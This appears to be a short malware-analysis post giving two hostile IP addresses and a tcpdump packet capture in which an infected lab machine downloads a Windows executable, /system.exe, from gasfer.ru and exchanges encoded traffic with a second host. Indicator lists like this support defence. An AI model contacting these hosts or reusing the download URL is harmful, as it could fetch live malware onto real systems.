Malware downloads and loads the dropper from the 64.31.23.26 but the host is down so it dies at this point.
Hostile IPs:
64.31.23.26
81.177.135.143
2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win 16425, length 393: HTTP: GET /system.exe HTTP/1.1
E…..@….!
.
.Q….S.P……..P.@)Zs..GET /system.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gasfer.ru
Connection: Keep-Alive
2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0
E..(..@…..
.
.@….,.P.3..X.}.P.?..z……..
2020-05-29 21:35:33.690338 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [.], ack 394, win 237, length 0
E..(..@.2…Q…
.
..P.S…….^P………….
2020-05-29 21:35:33.730407 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [P.], seq 1:276, ack 394, win 237, length 275: HTTP: HTTP/1.1 200 OK
E..;..@.2…Q…
.
..P.S…….^P…….HTTP/1.1 200 OK
Date: Sat, 30 May 2020 01:37:41 GMT
Content-Type: application/octet-stream
Content-Length: 94720
Connection: keep-alive
Server: Jino.ru/mod_pizza
Last-Modified: Sat, 09 May 2020 23:44:17 GMT
ETag: “503c713-17200-5a53fb1282665”
Accept-Ranges: bytes
2020-05-29 21:35:33.731426 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [.], seq 276:1736, ack 394, win 237, length 1460: HTTP
E…..@.2..6Q…
.
..P.S…….^P….^..MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
2020-05-29 21:35:33.348218 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [P.], seq 3090396531:3090396582, ack 1491893693, win 16363, length 51: HTTP
E..[..@…..
.
.@….,.P.3.sX.}.P.?.4/……….`:…..k.>…t.Y..5.=T}[[..K.)a……j. .hg
2020-05-29 21:35:33.374491 IP 64.31.23.26.80 > 10.1.10.15.49196: Flags [.], ack 51, win 271, length 0
E..(t.@.0.j.@…
.
..P.,X.}..3..P…>|……..
2020-05-29 21:35:33.455371 IP 64.31.23.26.80 > 10.1.10.15.49196: Flags [P.], seq 1:50, ack 51, win 271, length 49: HTTP
E..Yt.@.0.j.@…
.
..P.,X.}..3..P….B……,..’.x..1…..%..p..W.:.q…fj..y…….c.G~/
2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0
E..(..@…..
.
.@….,.P.3..X.}.P.?..z……..
Please follow and like us: